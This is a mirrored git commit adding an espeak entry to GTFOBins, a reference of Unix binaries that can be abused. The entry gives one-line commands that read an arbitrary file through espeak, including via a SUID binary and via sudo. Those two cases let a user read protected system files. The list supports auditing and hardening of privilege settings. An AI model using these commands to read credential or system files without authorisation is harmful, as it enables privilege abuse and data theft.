1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add espeak

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
pad0van 2022-12-16 22:00:52 +08:00 committed by GitHub
parent 9058ed555f
commit 6f87df3530
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

16
_gtfobins/espeak.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The file content appears in the middle of other textual information, thus it might not be suitable to read arbitray binary files.
functions:
file-read:
- code: |
LFILE=file_to_read
espeak -qXf "$LFILE"
suid:
- code: |
LFILE=file_to_read
./espeak -qXf "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo espeak -qXf "$LFILE"
---